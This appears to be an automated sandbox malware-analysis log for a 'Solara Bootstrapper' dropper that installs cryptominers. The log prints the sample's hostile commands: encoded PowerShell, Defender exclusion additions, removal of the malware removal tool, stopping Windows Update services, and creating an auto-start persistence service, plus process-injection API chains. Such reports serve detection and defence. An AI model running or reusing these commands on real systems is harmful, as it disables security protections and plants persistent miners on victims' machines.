Source: global trafficHTTP traffic detected: GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1Host: github.com
Source: Joe Sandbox ViewIP Address: 185.199.109.133 185.199.109.133
Source: Joe Sandbox ViewIP Address: 185.199.109.133 185.199.109.133
Source: Joe Sandbox ViewIP Address: 140.82.121.3 140.82.121.3
Source: Joe Sandbox ViewIP Address: 140.82.121.3 140.82.121.3
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49706 -> 140.82.121.3:443
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /quivings/Solara/main/Storage/version.txt HTTP/1.1User-Agent: SolaraHost: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1Host: github.com
Source: global trafficDNS traffic detected: DNS query: github.com
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Tue, 07 Jan 2025 15:09:09 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-WithCache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: AADD:29B7FE:662F5A:719583:677D4395Accept-Ranges: bytesDate: Tue, 07 Jan 2025 15:09:10 GMTVia: 1.1 varnishX-Served-By: cache-ewr-kewr1740055-EWRX-Cache: MISSX-Cache-Hits: 0X-Timer: S1736262550.984424,VS0,VE28Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *Cross-Origin-Resource-Policy: cross-originX-Fastly-Request-ID: 8babbe5f5a38ad2b58889605f76de69410d799f9Expires: Tue, 07 Jan 2025 15:14:10 GMTSource-Age: 0
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Tue, 07 Jan 2025 15:09:09 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-WithCache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
Source: powershell.exe, 00000001.00000002.2223359598.00000000054BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.2201684316.00000000045A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2201684316.00000000045A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.2201684316.0000000004451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.2201684316.00000000045A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000001.00000002.2201684316.00000000045A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.2201684316.0000000004451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBjq
Source: powershell.exe, 00000001.00000002.2223359598.00000000054BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.2223359598.00000000054BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.2223359598.00000000054BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.2201684316.00000000045A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: Solara Bootstrapper.exe, 00000000.00000002.2099938407.00000000013D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/quivings/Solara/raw/main/Files/Solara.Dir.zipK
Source: powershell.exe, 00000001.00000002.2223359598.00000000054BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: Solara Bootstrapper.exe, 00000000.00000002.2099938407.00000000013D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/quivings/Solara/main/Storage/version.txt
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.5:49705 version: TLS 1.2

System Summary

barindex
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\dialer.exeCode function: 46_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,46_2_00000001400010C0
Source: C:\Windows\System32\winlogon.exeCode function: 53_2_000001E8589B28C8 NtEnumerateValueKey,NtEnumerateValueKey,53_2_000001E8589B28C8
Source: C:\Windows\System32\dialer.exeCode function: 63_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,63_2_00000001400010C0
Source: C:\Windows\System32\lsass.exeCode function: 68_2_00000140AE86202C NtQuerySystemInformation,StrCmpNIW,68_2_00000140AE86202C
Source: C:\Windows\System32\lsass.exeCode function: 68_2_00000140AE86253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,68_2_00000140AE86253C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0443B5701_2_0443B570
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08153E981_2_08153E98
Source: C:\Windows\System32\conhost.exeCode function: 2_2_0000019A497D1F2C2_2_0000019A497D1F2C
Source: C:\Windows\System32\conhost.exeCode function: 2_2_0000019A497E38A82_2_0000019A497E38A8
Source: C:\Windows\System32\conhost.exeCode function: 2_2_0000019A497DD0E02_2_0000019A497DD0E0
Source: C:\Windows\System32\conhost.exeCode function: 2_2_0000019A49802B2C2_2_0000019A49802B2C
Source: C:\Windows\System32\conhost.exeCode function: 2_2_0000019A4980DCE02_2_0000019A4980DCE0
Source: C:\Windows\System32\conhost.exeCode function: 2_2_0000019A498144A82_2_0000019A498144A8
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeCode function: 5_2_00EB08905_2_00EB0890
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeCode function: 5_2_00EB08805_2_00EB0880
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04F9B5787_2_04F9B578
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04F9B5687_2_04F9B568
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_08FC3AA87_2_08FC3AA8
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 15_2_000001F43C51D0E015_2_000001F43C51D0E0
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 15_2_000001F43C5238A815_2_000001F43C5238A8
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 15_2_000001F43C511F2C15_2_000001F43C511F2C
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 15_2_000001F43C54DCE015_2_000001F43C54DCE0
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 15_2_000001F43C5544A815_2_000001F43C5544A8
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 15_2_000001F43C542B2C15_2_000001F43C542B2C
Source: C:\Windows\System32\dialer.exeCode function: 46_2_000000014000226C46_2_000000014000226C
Source: C:\Windows\System32\dialer.exeCode function: 46_2_00000001400014D846_2_00000001400014D8
Source: C:\Windows\System32\dialer.exeCode function: 46_2_000000014000256046_2_0000000140002560
Source: C:\Windows\System32\winlogon.exeCode function: 53_2_000001E858981F2C53_2_000001E858981F2C
Source: C:\Windows\System32\winlogon.exeCode function: 53_2_000001E8589938A853_2_000001E8589938A8
Source: C:\Windows\System32\winlogon.exeCode function: 53_2_000001E85898D0E053_2_000001E85898D0E0
Source: C:\Windows\System32\winlogon.exeCode function: 53_2_000001E8589B2B2C53_2_000001E8589B2B2C
Source: C:\Windows\System32\winlogon.exeCode function: 53_2_000001E8589C44A853_2_000001E8589C44A8
Source: C:\Windows\System32\winlogon.exeCode function: 53_2_000001E8589BDCE053_2_000001E8589BDCE0
Source: C:\Windows\System32\dialer.exeCode function: 63_2_000000014000226C63_2_000000014000226C
Source: C:\Windows\System32\dialer.exeCode function: 63_2_00000001400014D863_2_00000001400014D8
Source: C:\Windows\System32\dialer.exeCode function: 63_2_000000014000256063_2_0000000140002560
Source: C:\Windows\System32\lsass.exeCode function: 68_2_00000140ADFC1F2C68_2_00000140ADFC1F2C
Source: C:\Windows\System32\lsass.exeCode function: 68_2_00000140ADFCD0E068_2_00000140ADFCD0E0
Source: C:\Windows\System32\lsass.exeCode function: 68_2_00000140ADFD38A868_2_00000140ADFD38A8
Source: C:\Windows\System32\lsass.exeCode function: 68_2_00000140AE86DCE068_2_00000140AE86DCE0
Source: C:\Windows\System32\lsass.exeCode function: 68_2_00000140AE8744A868_2_00000140AE8744A8
Source: C:\Windows\System32\lsass.exeCode function: 68_2_00000140AE862B2C68_2_00000140AE862B2C
Source: Joe Sandbox ViewDropped File: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe 4C9D878E35E7FD497C633A770D3359FB37447985450DC19F45DB0925972C39E0
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Kawpow new.exe 4C9D878E35E7FD497C633A770D3359FB37447985450DC19F45DB0925972C39E0
Source: Solara Bootstrapper.exe, 00000000.00000002.2099938407.00000000013D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSolaraBootstrapper.exeF vs Solara Bootstrapper.exe
Source: Solara Bootstrapper.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: classification engineClassification label: mal100.spyw.evad.winEXE@110/24@2/2
Source: C:\Windows\System32\dialer.exeCode function: 46_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,46_2_000000014000226C
Source: C:\Windows\System32\dialer.exeCode function: 63_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,63_2_000000014000226C
Source: C:\Windows\System32\dialer.exeCode function: 46_2_00000001400019C4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,46_2_00000001400019C4
Source: C:\Windows\System32\dialer.exeCode function: 46_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,46_2_000000014000226C
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SolaraBootstrapper.exe.logJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8176:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7716:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7952:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7992:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5492:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8008:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7904:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6540:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7808:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5960:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5428:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1372:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8168:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3292:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2300:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7944:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2964:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7856:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8120:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5448:120:WilError_03
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeFile created: C:\Users\user\AppData\Local\Temp\kx new.exeJump to behavior
Source: Solara Bootstrapper.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Solara Bootstrapper.exeReversingLabs: Detection: 68%
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_0-82
Source: C:\Users\user\AppData\Local\Temp\kx new.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_4-82
Source: unknownProcess created: C:\Users\user\Desktop\Solara Bootstrapper.exe "C:\Users\user\Desktop\Solara Bootstrapper.exe"
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA="
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeProcess created: C:\Users\user\AppData\Local\Temp\kx new.exe "C:\Users\user\AppData\Local\Temp\kx new.exe"
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeProcess created: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe "C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe"
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\kx new.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA="
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\kx new.exeProcess created: C:\Users\user\AppData\Local\Temp\Kawpow new.exe "C:\Users\user\AppData\Local\Temp\Kawpow new.exe"
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\kx new.exeProcess created: C:\Users\user\AppData\Local\Temp\xmr new.exe "C:\Users\user\AppData\Local\Temp\xmr new.exe"
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "CKTJZLMO"
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto"
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
